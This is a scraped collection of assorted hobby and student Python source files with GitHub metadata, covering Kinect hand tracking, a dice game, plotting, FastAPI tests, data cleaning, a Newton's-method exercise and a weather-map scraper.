top_left_coordinates\n top_left_coordinates[0] = x_coord\n top_left_coordinates[1] = y_coord\n # z coord requires shifting of x and y in order to stay in that place but appear to \"shrink\" or grow\n \n\ndef handTracking(frame):\n # hand tracker\n image = cv2.resize(frame, (320,240), interpolation = cv2.INTER_AREA)\n image_ycrcb = np.array(cv2.cvtColor(image, cv2.COLOR_RGB2YCR_CB))\n # print(image_ycrcb[0][0])\n skin1 = (50, 89, 136)\n skin2 = (231, 147, 181)\n mask = cv2.inRange(image_ycrcb, skin1, skin2)\n result = cv2.bitwise_and(image, image, mask=mask)\n # cv2.imshow(\"Color\", result)\n # cv2.imshow(\"Mask\", mask) # 240 x 320 white or black image\n\n # find highest concentration of values in mask matrix closest to bottom of image\n r_region_counters = []\n c_region_counters = []\n region_sums = []\n south_deltas = []\n # find all regions with pixel count larger than 270 000\n for r_counter in range(0,320,5):\n for c_counter in range(0,240,5):\n region_sum = np.sum(mask[r_counter:r_counter+60,c_counter:c_counter+80]) # sum all white pixels in proposal region\n if(region_sum > 100000): # if more white pixels here than average\n south_delta = abs(r_counter-240)\n south_deltas.append(south_delta)\n region_sums.append(region_sum)\n r_region_counters.append(r_counter)\n c_region_counters.append(c_counter)\n # find southmost\n if(len(south_deltas) ==0):\n return\n southmost_delta = np.amin(south_deltas)\n # find largest region within 50px of southmost point\n largest_south_index = 0\n for current_region in range(len(region_sums)):\n # print(\"south_deltas[current_region] - southmost_delta: \", south_deltas[current_region] - southmost_delta)\n if(region_sums[current_region] > region_sums[largest_south_index]):\n if( abs(south_deltas[current_region] - southmost_delta) < 50):\n largest_south_index = current_region\n moveCube((c_region_counters[largest_south_index]+10)/320, (r_region_counters[largest_south_index]+20)/240)\n \n\ndef drawCube(background_image,top_left_coordinates, width_cube):\n # BGR colors\n RED = (0, 0, 255)\n GREEN = (0,255,0)\n BLUE = (255,0,0)\n ORANGE = (34,156,228)\n front_face_pts = [top_left_coordinates, (top_left_coordinates[0]+width_cube, top_left_coordinates[1]), (top_left_coordinates[0]+width_cube, top_left_coordinates[1]+width_cube), (top_left_coordinates[0],top_left_coordinates[1]+width_cube) ]\n top_face_pts = [top_left_coordinates,(int(top_left_coordinates[0]+width_cube/2),int(top_left_coordinates[1]-width_cube/2)),(int(top_left_coordinates[0]+width_cube*1.5),int(top_left_coordinates[1]-width_cube/2)),(int(top_left_coordinates[0]+width_cube), top_left_coordinates[1])]\n side_face_pts = [(int(top_left_coordinates[0]+width_cube), top_left_coordinates[1]),(int(top_left_coordinates[0]+width_cube*1.5),int(top_left_coordinates[1]-width_cube/2)),(int(top_left_coordinates[0]+width_cube*1.5),int(top_left_coordinates[1]+width_cube/2)),(top_left_coordinates[0]+width_cube, top_left_coordinates[1]+width_cube)]\n\n cv2.fillPoly(background_image, np.array([front_face_pts]), ORANGE)\n cv2.fillPoly(background_image, np.array([top_face_pts]), GREEN)\n cv2.fillPoly(background_image, np.array([side_face_pts]), BLUE)\n\ndef check_space_occupied(depth_data, proposed_x, proposed_y, proposed_z):\n # check depthInput at pixels to see if object there\n depth_z = int(650 -10*(proposed_z-3))\n for x in range(proposed_x-20, proposed_x+20):\n for y in range(proposed_y-20, proposed_y+20):\n if(proposed_x >=0 and proposed_x < 640 and proposed_y >= 0 and proposed_y < 480):\n # if pixel trying to move to has depth value close to that of object - collision!\n if( depth_data[proposed_x][proposed_y] >= depth_z-50 and depth_data[proposed_x][proposed_y] <= depth_z+50):\n return True\n return False\n\nwhile True:\n # read in from Kinect\n depthInput = freenect.sync_get_depth()[0]\n videoInput = freenect.sync_get_video()[0]\n background_image = cv2.cvtColor(np.array(videoInput) , cv2.COLOR_BGR2RGB)\n image = cv2.resize(background_image, (320,240), interpolation = cv2.INTER_AREA)\n image_ycrcb = np.array(cv2.cvtColor(image, cv2.COLOR_RGB2YCR_CB))\n # print(image_ycrcb[0][0])\n skin1 = (50, 89, 136)\n skin2 = (231, 147, 181)\n # skin1 = (89, 119, 140)\n # skin2 = (255, 179, 187)\n mask = cv2.inRange(image_ycrcb, skin1, skin2)\n result = cv2.bitwise_and(image, image, mask=mask)\n # cv2.imshow(\"Color\", result)\n cv2.imshow(\"Mask\", mask) # 240 x 320 white or black image\n # hand tracking\n # find highest concentration of values in mask matrix closest to bottom of image\n r_region_counters = []\n c_region_counters = []\n region_sums = []\n left_deltas = []\n # find all regions with pixel count larger than 270 000\n for r_counter in range(0,320,5):\n for c_counter in range(0,240,5):\n region_sum = np.sum(mask[r_counter:r_counter+60,c_counter:c_counter+80]) # sum all white pixels in proposal region\n if(region_sum > 1000): # if more white pixels here than average\n left_delta = abs(c_counter-120 + r_counter-160) # distance from centre\n left_deltas.append(left_delta)\n region_sums.append(region_sum)\n r_region_counters.append(r_counter)\n c_region_counters.append(c_counter)\n # find leftmost\n if(len(left_deltas) !=0):\n leftmost_delta = np.amin(left_deltas)\n # find largest region within 50px of leftmost point\n largest_left_index = 0\n for current_region in range(len(region_sums)):\n # print(\"left_deltas[current_region] - leftmost_delta: \", left_deltas[current_region] - leftmost_delta)\n if(region_sums[current_region] > region_sums[largest_left_index]):\n if( abs(left_deltas[current_region] - leftmost_delta) < 30):\n largest_left_index = current_region\n cv2.imshow(\"result\", cv2.rectangle(result, (c_region_counters[largest_left_index],r_region_counters[largest_left_index]), (c_region_counters[largest_left_index]+80,r_region_counters[largest_left_index]+60), (0,0,255), 2))\n drawCube(background_image,[c_region_counters[largest_left_index]+50,r_region_counters[largest_left_index]+70],100) # draw Cube over Kinect feed\n cv2.imshow('Cube Image', background_image)\n print(\"Current coords: x: \", top_left_coordinates[0], \", y: \", top_left_coordinates[1], \", z: \", cube_depth,\" on z axis or \", int(650 -10*(cube_depth-3)), \" on depth scale\")\n if cv2.waitKey(1) == ord(\"w\"):\n top_left_coordinates[1] -=10\n if cv2.waitKey(1) == ord(\"s\"):\n top_left_coordinates[1] +=10\n if cv2.waitKey(1) == ord(\"a\"):\n object_collision = check_space_occupied(depthInput,top_left_coordinates[0]-10,top_left_coordinates[1])\n if(object_collision == False):\n top_left_coordinates[0] -=10\n if cv2.waitKey(1) == ord(\"d\"):\n object_collision = check_space_occupied(depthInput,top_left_coordinates[0]+10,top_left_coordinates[1])\n if(object_collision == False):\n top_left_coordinates[0] +=10\n if cv2.waitKey(1) == ord(\"i\"):\n width_cube += 10\n cube_depth +=1\n if cv2.waitKey(1) == ord(\"o\"):\n width_cube -= 10\n cube_depth -= 1\ncv2.destroyAllWindows()","repo_name":"mitch7w/Final-Year-Project","sub_path":"prototypes/OpenGL Virtual Object/OpenCV_cube_kinect.py","file_name":"OpenCV_cube_kinect.py","file_ext":"py","file_size_in_byte":8149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"32765833364","text":"__author__ = 'Dreyke Boone'\n\nimport random\n\n# class to roll die\nclass Dice():\n\n # gets a random integer and returns its value\n def roll(self):\n self.value = random.randint(1,6)\n return self.value\n\nclass Points():\n\n # constructor method with instance variables\n def __init__(self, turnTotal, player, playerCount, score, finalScore):\n self.turnTotal = turnTotal\n self.player = player\n self.playerCount = playerCount\n self.score = score\n self.finalScore = finalScore\n\ndef main():\n\n # game object - sets up instance variables of constructor method\n game = Points(0, 0, 2, [0] * 2, 20)\n\n # while loop to run the game. Loop ends when a player wins.\n while max(game.score) < game.finalScore:\n\n # ask user if they would like to roll or pass. Displays their total score and their accumulative score for their\n # turns.\n playerRoll = input(\"\\nPlayer %i: Do you want to roll the die? (Y or N)\"\n \"\\n(Your Total Score = %i, Your Current Score = %i) \"\n % (game.player, game.score[game.player], game.turnTotal)) in {'yes', 'y', ''}\n\n # loop, with nested loops, to roll dice, keep track of score, and player turn\n if playerRoll:\n # dieRoll object to get a random value from the Die class\n diceRoll = Dice().roll()\n print(' You rolled %i' % diceRoll)\n\n # loop to track if player rolls a 1. If they do, they lose their score for that round. Goes to next players turn\n if diceRoll == 1:\n print(' You rolled a 1. You lose %i points but still keep your previous %i'\n % (game.turnTotal, game.score[game.player]))\n game.turnTotal, game.player = 0, (game.player + 1) % game.playerCount\n else:\n game.turnTotal += diceRoll\n else:\n game.score[game.player] += game.turnTotal\n if game.score[game.player] >= game.finalScore:\n break\n print(' Player %i is sticking with %i points' % (game.player, game.score[game.player]))\n game.turnTotal, game.player = 0, (game.player + 1) % game.playerCount\n\n # display winners score\n print('\\nPlayer %i wins with a total score of %i' % (game.player, game.score[game.player]))\n\nmain()","repo_name":"Dreyke/Project-1","sub_path":"pig.py","file_name":"pig.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70065955592","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass PlotFunctions():\n \"\"\"\n Построение функций\n \"\"\"\n\n def sigmoid(self, x):\n return (1 / (1 + np.exp(-x)))\n\n def plot1(self):\n \"\"\"\n Построение sin(x) на интервале [0,1]\n \"\"\"\n x = np.linspace(0, np.pi, 100)\n y = np.sin(x)\n plt.subplot(2, 4, 1)\n plt.title('sin(x)')\n plt.plot(x, y)\n\n def plot2(self):\n \"\"\"\n Построение f(x) = sigmoid(x)\n \"\"\"\n x = np.linspace(-5, 5, 100)\n plt.subplot(2, 4, 2)\n plt.title('f(x) = sigmoid(x)')\n plt.plot(x, self.sigmoid(x))\n\n def plot3(self):\n \"\"\"\n Построение -f(x+6)*6 - 6\n \"\"\"\n x = np.linspace(-5, 5, 100)\n plt.subplot(2, 4, 3)\n plt.title('-f(x+6)*6-6')\n plt.plot(x, -(self.sigmoid(x)+6)*6 - 6)\n\n def plot4(self):\n \"\"\"\n Построение 2f(x+3)+1\n \"\"\"\n x = np.linspace(-5, 5, 100)\n plt.subplot(2, 4, 4)\n plt.title('2f(x+3)+1')\n plt.plot(x, 2*(self.sigmoid(x)+3)+1)\n\n def plot5(self):\n \"\"\"\n Построение одного графика из двух\n \"\"\"\n x = np.linspace(-5, 5, 100)\n plt.subplot(2, 4, 5)\n plt.title('Два в одном')\n plt.plot(x-5, self.sigmoid(x))\n plt.plot(x+5, self.sigmoid(-x))\n\n def plot6(self):\n \"\"\"\n Аппроксимация sin(x)\n \"\"\"\n x = np.linspace(-5, 5, 20)\n y = np.sin(x)\n t = np.polyfit(x, y, 7)\n f = np.poly1d(t)\n plt.subplot(2, 4, 6)\n plt.title('Аппроксимация sin(x)')\n plt.plot(x, y, 'o', x, f(x), 'r')\n\ndef main():\n plt.rcParams['figure.figsize'] = [15, 5]\n test = PlotFunctions()\n test.plot1()\n test.plot2()\n test.plot3()\n test.plot4()\n test.plot5()\n test.plot6()\n plt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"avspit/prt","sub_path":"ex2/PlotFunction.py","file_name":"PlotFunction.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24197521706","text":"from typing import Generator\nfrom main import app, get_user_info, markup_agent\nfrom models import MPMessage\nfrom fastapi.testclient import TestClient\nfrom tortoise.contrib.test import finalizer, initializer\nfrom tortoise import Tortoise, generate_schema_for_client\nimport pytest, asyncio\n\n@pytest.fixture(scope='session')\ndef client() -> Generator:\n initializer(['main'])\n with TestClient(app) as c:\n yield c\n finalizer()\n\n@pytest.fixture(scope='session')\ndef event_loop(client : TestClient) -> Generator:\n yield client.task.get_loop()\n\ndef test_create_message(client : TestClient, event_loop : asyncio.AbstractEventLoop):\n async def create_msg():\n msg = await MPMessage.create(\n publisher='dnwj88cjqiX0a',\n content='fake message content'\n )\n return msg\n\n msg = event_loop.run_until_complete(create_msg())\n\n assert msg is not None\n assert msg.id > 0\n\n async def find_msg():\n return await MPMessage.first()\n\n msg = event_loop.run_until_complete(find_msg())\n assert msg is not None\n assert msg.id > 0\n assert msg.content == 'fake message content'\n assert not msg.content == 'fuck'\n # msg = await MPMessage_Pydantic.from_tortoise_orm(msg)\n # assert msg.id > 0\n # assert len(msg.content) > 10\n\ndef test_get_agent_info(client : TestClient, event_loop : asyncio.AbstractEventLoop):\n real_openid = 'o7OPz5NdjQFmShx_g2tcVAmlhZsU'\n agent_openid = 'o7OPz5EdwMjpPlaw0IyNNNBaBd8g'\n res = get_user_info(real_openid)\n agent_res = get_user_info(agent_openid)\n assert res.status_code == 200\n assert res['username'] == real_openid","repo_name":"colaftc/mpbot","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36728690251","text":"import pandas as pd\nimport numpy as np\n# from matplotlib import pyplot as plt\n# import seaborn as sns\nimport datetime as dt\n\nclass CleanData(object):\n ''' Class with functions for manipulating trending video \n YouTube data.\n '''\n # def __init__(self):\n # pass\n\n # didn't work this way\n # def load_csv(self, file_path):\n # return pd.read_csv(file_path)\n\n def load_csv(file_path):\n return pd.read_csv(file_path)\n\n def load_json(file_path):\n return pd.read_json(file_path)\n\n def fill_nan(df):\n df[\"description\"] = df[\"description\"].fillna(value=\"\")\n return df\n\n def join_categories(df, df_json):\n # create category_name column from json files\n cat_dict = {}\n for cat in df_json[\"items\"]:\n cat_dict[int(cat[\"id\"])] = cat[\"snippet\"][\"title\"]\n df['category_name'] = df['category_id'].map(cat_dict)\n return df\n\n def date_format(df):\n # [\"trending_date\", \"publish_time\"]\n # [\"trend_end\", \"post_time\"]\n df[\"trend_end\"] = pd.to_datetime(df[\"trending_date\"], format=\"%y.%d.%m\")\n df[\"post_time\"] = pd.to_datetime(df[\"publish_time\"])\n return df\n\n def unique_reduce(df):\n # count # of days video appears on trending\n day_max = df[['video_id', 'trend_end']].groupby(['video_id']).max().iloc[:,0]\n day_min = df[['video_id', 'trend_end']].groupby(['video_id']).min().iloc[:,0]\n df[\"trend_begin\"] = df[\"video_id\"].map(day_min)\n delta_map = day_max - day_min + dt.timedelta(days=1)\n df[\"days_trending\"] = df[\"video_id\"].map(delta_map)\n # record initial viewcount on trending start\n min_map = df[['video_id', 'views']].groupby(['video_id']).min().iloc[:,0]\n df[\"views_initial\"] = df[\"video_id\"].map(min_map)\n # reduce df to most recent unique video data\n col_sel = ['video_id', 'title', 'channel_title', 'category_name', 'tags',\n 'views', 'views_initial','trend_begin', 'trend_end', 'days_trending',\n 'post_time', 'likes', 'dislikes', 'comment_count']\n return df[col_sel].groupby(['video_id']).max().copy()\n\n\n","repo_name":"truejimfrank/TrendTagsGraph","sub_path":"src/TrendClass.py","file_name":"TrendClass.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36708413216","text":"n = int(input())\na = list(map(int, input().split()))\nfor i in range(len(a) - 1, -1, -1):\n if a[i] == 1:\n cntnum = 2\n num = 1\n for j in range(i + 1, len(a)):\n if a[j] == cntnum:\n num += 1\n cntnum += 1\n print(n - num)\n exit()\n\nprint(-1)\n","repo_name":"kanade9/kyopro","sub_path":"AtCoder/ABC D/148.py","file_name":"148.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39787561883","text":"import numpy as np\nfrom .jit_compiled_functions import (sampling_get_potential_targets,\n sampling_sample_from_array_condition)\n\n\nclass BaseSamplingSingleSpecies:\n \"\"\"\n Base Class for single species sampling.\n \"\"\"\n def __init__(self, target_species=None, **kwargs):\n if target_species is None:\n raise ValueError(\"No agent object provided for the sampling. Should be provided using kwarg \"\n \"'target_species'.\")\n self.target_species = target_species\n\n\nclass SamplingSingleSpecies:\n \"\"\"\n Introduce the methods for sampling a single species\n \"\"\"\n def __init__(self, **kwargs):\n pass\n\n def sample_proportion_from_array(self, array_proportion, condition=None, position_attribute='position',\n return_as_pandas_df=False, eliminate_sampled_pop=False):\n \"\"\"\n Take as input an array telling the proportion of agent to sample in each vertex.\n\n :param array_proportion: 1D array of float. array_proportion[i] is the probability for an agent living in the\n vertex of index i.\n :param condition: optional, 1D array of bool, default None. If not None, tell which agent can be sampled.\n :param position_attribute: optional, string, default 'position'. Tell which attribute of the agents should\n be used as position.\n :param return_as_pandas_df: optional, boolean, default False. Clear.\n :param eliminate_sampled_pop: optional, boolean, default False. If True,\n\n :return: a DataFrameXS if return_as_pandas_df is False, a pandas dataframe otherwise. The returned DF is\n the sample of the population taken from df_population\n \"\"\"\n targets = sampling_get_potential_targets(self.target_species.df_population[position_attribute],\n array_proportion)\n if condition is not None:\n targets = targets & condition\n\n rand = np.random.uniform(0, 1, (targets.sum(),))\n\n sampled = sampling_sample_from_array_condition(array_proportion,\n self.target_species.df_population[position_attribute],\n rand, targets)\n\n","repo_name":"sampy-project/sampy-main","sub_path":"sampy/intervention/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"31047665983","text":"\"\"\"\nAuthor: Le Tuan Luc\nDate: 2021/09/05\nProgram: project_03_page_203.py\nProblem:\n Elena complains that the recursive newton function in Project 2 includes an extra argument for the estimate.\n The function’s users should not have to provide this value, which is always the same, when they call this function.\n Modify the definition of the function so that it uses a keyword argument with the appropriate default value, and call the function without a second argument to demonstrate that it solves this problem\nSolution:\n Default parameter estimate = 1.0\n Solved at project_02_page_203.py\n\"\"\"\nimport math\n\n\ndef newton(x, estimate=1.0):\n TOLERANCE = 0.000001\n estimate = (estimate + x / estimate) / 2\n difference = abs(x - estimate ** 2)\n if difference <= TOLERANCE:\n return estimate\n return newton(x, estimate)\n\n\ndef main():\n x = input(\"Enter a positive number: \")\n try:\n x = float(x)\n print(\"The square root of \", x, \"is \", round(newton(x), 2))\n print(\"Python's estimate: \", math.sqrt(x))\n main()\n except ValueError:\n print(\"Have a nice day!\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"FxLuc/python","sub_path":"chapter06/page_203/project_03_page_203.py","file_name":"project_03_page_203.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33518492676","text":"\r\n#importing data\r\nfrom data import *\r\nfrom map_styles import *\r\nfrom location import *\r\n\r\nfrom random import randint\r\nfrom datetime import datetime\r\nfrom time import sleep\r\nfrom typing import List\r\nfrom dataclasses import dataclass\r\nimport json\r\nimport os\r\n\r\nimport pandas as pd\r\nimport geopandas as gpd\r\nimport folium\r\nfrom pyodide.http import open_url\r\nimport js\r\nimport asyncio\r\nfrom requests import request\r\n\r\n#ignore warnings\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\n#constants\r\nprint('INFO: Loading Bondaries')\r\nFSAS_GPD = gpd.read_file('boundaries.geojson').rename(columns={'POSTCODE': 'FSA'})\r\nFSAS_GPD['centroid'] = FSAS_GPD.centroid\r\n\r\nprint('INFO: Creating Paths')\r\n#create a directory to store the scraped data\r\nos.mkdir(os.getcwd()+'/jsons/')\r\nJSONS_PATH = os.getcwd()+'/jsons/'\r\n\r\nprint('INFO: Loading Locations')\r\n#Initiate all the locations\r\nLOCATIONS = []\r\nfor loc in LOCATIONS_DICT.values():\r\n LOCATIONS.append(Location(loc['retailerSiteId'], loc['retailOutletLocationSk'], loc['name'], loc['acronym'], loc['region'], loc['business'], loc['kind'], loc['address'], loc['geo_coordinates']))\r\n\r\nclass FSA: \r\n '''\r\n A class to represent canadian forward sortation areas i.e. FSA.\r\n ...\r\n Attributes\r\n ----------\r\n Methods\r\n ----------\r\n '''\r\n def __init__(self, fsa_name: str) -> None:\r\n self.fsa_name: str = fsa_name\r\n self.geometry = FSAS_GPD[FSAS_GPD['FSA'] == fsa_name].geometry.values\r\n self.centroid = FSAS_GPD[FSAS_GPD['FSA'] == fsa_name]['centroid'].values\r\n\r\n def __repr__(self) -> str:\r\n return self.fsa_name\r\n\r\nclass Zone: \r\n '''\r\n A class to represent OSP Zone areas, derived from the csv file that can be exported from OSP's website.\r\n link: https://delivery-area.voila.osp.tech/delivery-zones\r\n ...\r\n Attributes\r\n ----------\r\n Methods\r\n ----------\r\n '''\r\n def __init__(self, serviced_by_location: Location, zone_name: str, zone_business: str, zone_fsas: List) -> None:\r\n self.serviced_by: Location = serviced_by_location\r\n self.name: str = zone_name\r\n self.business: str = zone_business\r\n self.fsas: List[FSA] = []\r\n\r\n for fsa in zone_fsas:\r\n self.fsas.append(FSA(fsa))\r\n \r\n def __repr__(self) -> str:\r\n return f\"Zone: {self.name} | Serviced by: {self.serviced_by.acronym}\"\r\n \r\n @property\r\n def geometry(self):\r\n geometries = []\r\n for fsa in self.fsas:\r\n #work around to ignore empty geometries\r\n if len(fsa.geometry) > 0:\r\n geometries.append(fsa.geometry[0])\r\n return gpd.GeoSeries(geometries).unary_union\r\n\r\n @property\r\n def centroid(self):\r\n return self.geometry.centroid\r\n\r\ndef process_json_reponse(city, data_json):\r\n filtered_data = []\r\n for obs in data_json['sevendays']['periods']:\r\n filtered_data.append({ \r\n \"scrape_date\" : datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"),\r\n \"placecode\" : city['placecode'],\r\n \r\n \"city_prov\" : city['prov'],\r\n \"city_name\" : city['city'],\r\n \"city_lat\" : city['lat'],\r\n \"city_lon\" : city['lon'],\r\n \"city_zone\" : city['zone'],\r\n \r\n \"date_complete\" : obs['cdate'],\r\n \"Date\" : obs['super_short_dayanddate'],\r\n \"weekday\" : obs['super_short_day'],\r\n \"month_day\" : obs['super_short_date'],\r\n\r\n \"Period\" : \"AM\",\r\n\r\n \"Wind Direction\" : obs['wd'],\r\n \"Wind Speed\" : int(obs['metric_windSpeed']),\r\n \"Wind Speed Unit\" : obs['metric_windSpeed_unit'],\r\n \"Wind Gust\" : int(obs['windGust']),\r\n \"Wind Gust Unit\" : obs['gust_unit'],\r\n \"Feels Like\" : int(obs['metric_feelsLike']),\r\n \"Feels Like Unit\" : obs['metric_feelsLike_unit'],\r\n \"Temperature\" : int(obs['tmac']),\r\n \"Temperature Unit\" : obs['metric_temperatureMax_unit'],\r\n \"Rain\" : obs['r'],\r\n \"Rain Unit\" : obs['ru'],\r\n \"Snow\" : obs['s'],\r\n \"Snow Unit\" : obs['su'],\r\n \"POP\" : int(obs['pdp']),\r\n \"Description\" : obs['itd'],\r\n })\r\n \r\n filtered_data.append({ \r\n \"scrape_date\" : datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"),\r\n \"placecode\" : city['placecode'],\r\n \r\n \"city_prov\" : city['prov'],\r\n \"city_name\" : city['city'],\r\n \"city_lat\" : city['lat'],\r\n \"city_lon\" : city['lon'],\r\n \"city_zone\" : city['zone'],\r\n \r\n \"date_complete\" : obs['cdate'],\r\n \"Date\" : obs['super_short_dayanddate'],\r\n \"weekday\" : obs['super_short_day'],\r\n \"month_day\" : obs['super_short_date'],\r\n\r\n \"Period\" : \"PM\",\r\n\r\n \"Wind Direction\" : obs['windDirectionNight'],\r\n \"Wind Speed\" : int(obs['windSpeedNight_kmh']),\r\n \"Wind Speed Unit\" : obs['windSpeedNight_unit'],\r\n \"Wind Gust\" : int(obs['windGustNight']),\r\n \"Wind Gust Unit\" : obs['gustNight_unit'],\r\n \"Feels Like\" : int(obs['feelsLikeNight']),\r\n \"Feels Like Unit\" : obs['feelsLikeNight_unit'],\r\n \"Temperature\" : int(obs['tmic']),\r\n \"Temperature Unit\" : obs['metric_temperatureMin_unit'],\r\n \"Rain\" : obs['rr'],\r\n \"Rain Unit\" : obs['ru'],\r\n \"Snow\" : obs['sr'],\r\n \"Snow Unit\" : obs['su'],\r\n \"POP\" : int(obs['pnp']),\r\n \"Description\" : obs['itn']})\r\n \r\n return filtered_data\r\n\r\ndef get_html_sandwich(city, df_weather):\r\n ##filter weather_df to get only that town's data\r\n data_df = df_weather[df_weather['placecode'] == city['placecode']]\r\n html_top_bun = f'''\r\n \r\n \r\n \r\n \r\n \r\n

{city['city']}

\r\n Data Source: The Weather Network. Last Update: {datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")} \r\n
\r\n \r\n \r\n '''\r\n\r\n html_table = f'''\r\n \r\n \r\n \r\n \r\n \r\n {data_df[['Date', 'Period', 'Description', 'Feels Like', 'Temperature', 'Rain', 'Snow', 'POP', 'Wind Direction', 'Wind Speed', 'Wind Gust']].head(14).to_html(table_id=\"summary\", index=False)}\r\n \r\n .\r\n '''\r\n return ''.join([html_top_bun, html_table])\r\n\r\ndef clear_folder(path):\r\n for i in os.listdir(path):\r\n os.remove(i)\r\n\r\nasync def scrape_data(cities, path):\r\n total_cities = len(cities)\r\n for i, city in enumerate(cities): \r\n #TODO error handling in case data can't get fetched\r\n #data = await json.load(open_url(f\"https://www.theweathernetwork.com/api/data/{city['placecode']}/\"))\r\n response = request(f\"https://www.theweathernetwork.com/api/data/{city['placecode']}/\")\r\n data = response.json()\r\n with open(f\"{path+city['placecode']}.json\", \"w\") as file:\r\n await json.dump(data, file)\r\n js.document.getElementById(\"refresh_progress\").style.width = str((len(os.listdir(path))/total_cities)*100)+'%'\r\n\r\ndef refresh_data(cities, path):\r\n clear_folder(path)\r\n asyncio.ensure_future(scrape_data(cities, path))\r\n\r\ndef main(): \r\n print(os.listdir(JSONS_PATH))\r\n #jsons.extend(process_json_reponse(city, data))\r\n #print(city['city'])\r\n #\r\n #df_weather = pd.DataFrame(jsons)\r\n\r\n #all_fsas = []\r\n #col_zones: List[Zone] = []\r\n #for key, value in ZONES.items():\r\n # zone_location = \"CFC\"\r\n # zone_fsas = value\r\n # zone_business = \"CFC\"\r\n # col_zones.append(Zone(zone_location, key, zone_business, zone_fsas))\r\n # all_fsas.extend(value)\r\n\r\n#\r\n ##instantiate map\r\n #m = folium.Map(location=[45.4769531, -73.7979043], zoom_start=8, tiles='cartodb positron')\r\n#\r\n #folium.raster_layers.WmsTileLayer(\r\n # url = 'https://geo.weather.gc.ca/geomet?',\r\n # layers = 'RADAR_1KM_RSNO',\r\n # transparent = True, \r\n # control = True,\r\n # fmt=\"image/png\",\r\n # name = 'Canada Weather Radar Snow',\r\n # overlay = True,\r\n # show = False,\r\n # opacity = 0.5\r\n #).add_to(m)\r\n#\r\n #legend_html = '''\r\n #{% macro html(this, kwargs) %}\r\n #
\r\n #\r\n #
\r\n #{% endmacro %}\r\n #'''\r\n #legend = folium.branca.element.MacroElement()\r\n #legend._template = folium.branca.element.Template(legend_html)\r\n#\r\n #folium.raster_layers.WmsTileLayer(\r\n # url = 'https://geo.weather.gc.ca/geomet?',\r\n # layers = 'RADAR_1KM_RRAI',\r\n # transparent = True, \r\n # control = True,\r\n # fmt=\"image/png\",\r\n # name = 'Canada Weather Radar Rain',\r\n # overlay = True,\r\n # show = False,\r\n # opacity = 0.65\r\n #).add_to(m)\r\n#\r\n ##change map tile\r\n #folium.TileLayer('stamentoner').add_to(m)\r\n #folium.TileLayer('OpenStreetMap').add_to(m)\r\n#\r\n #zones_group = folium.FeatureGroup(name='OSP Zones').add_to(m)\r\n ##add the existing zones geometries\r\n #for zone in col_zones:\r\n # fillColor = STYLES[zone.name]['fillColor']\r\n # color = STYLES[zone.name]['color']\r\n # tooltip = [zone.name]\r\n # zones_group.add_child(folium.GeoJson(\r\n # data=zone.geometry, \r\n # style_function=lambda x, fillColor=fillColor, color=color: {\r\n # \"fillColor\": fillColor,\r\n # \"color\": color,\r\n # },\r\n # tooltip=tooltip))\r\n#\r\n ##add location markers\r\n #markers_group = folium.FeatureGroup(name=\"Location Markers\").add_to(m)\r\n #markers_group.add_child(folium.Marker(location=[43.70300, -79.38900], popup='VAUGHAN CFC'))\r\n #markers_group.add_child(folium.Marker(location=[43.616401, -79.538833], popup='ETB SPOKE'))\r\n #markers_group.add_child(folium.Marker(location=[45.4769531, -73.7979043], popup='POINTE-CLAIRE CFC'))\r\n #markers_group.add_child(folium.Marker(location=[46.8400925, -71.2760664], popup='QBC SPOKE'))\r\n #markers_group.add_child(folium.Marker(location=[45.378810, -75.631818], popup='OTTAWA SPOKE'))\r\n#\r\n ##add circles for the \r\n #weather_observations_group = folium.FeatureGroup(name=\"Weather Observations\").add_to(m)\r\n#\r\n #for city in CITIES:\r\n # pop = get_html_sandwich(city, df_weather)\r\n # weather_observations_group.add_child(folium.CircleMarker(location=[city['lat'], city['lon']], popup=pop, radius=10, color='#69b3a2', fill=True, fill_color='#69b3a2'))\r\n#\r\n #folium.LayerControl().add_to(m)\r\n#\r\n #m.get_root().add_child(legend)\r\n#\r\n #fig = folium.branca.element.Figure(height=\"100%\")\r\n #fig.add_to(m)\r\n#\r\n #df_summary = df_weather[df_weather['Period']=='AM'].pivot(index=['city_prov', 'city_zone', 'city_name'], columns=['month_day'], values=['Snow'])\r\n#\r\n #display(HTML(m._repr_html_()), target=\"folium\")\r\n\r\nmain()","repo_name":"rafaellucas3/weatherwatch","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74823555271","text":"import numpy as np\nimport m_funcutil as m_fun\nimport pdb\n\n'''\npredict inputdata in the type of vector. predict value is 0~9\ninput : inputVec(one of the inputdata(1,784)), trainparaW(trained paraW (10,784))\noutput : predict value (scalor 0~9)\n'''\ndef predict_vec(inputVec, trainparaW, coeffi, penaModel):\n classNum, dimNum = trainparaW.shape\n\n predict_vec = []\n epochIdx = 0\n\n for i in range(classNum):\n predictVal = m_fun.softmax(inputVec, trainparaW, i, coeffi, penaModel)\n predict_vec = predict_vec + [predictVal]\n epochIdx += 1\n\n Max = np.amax(predict_vec)\n #output is place of 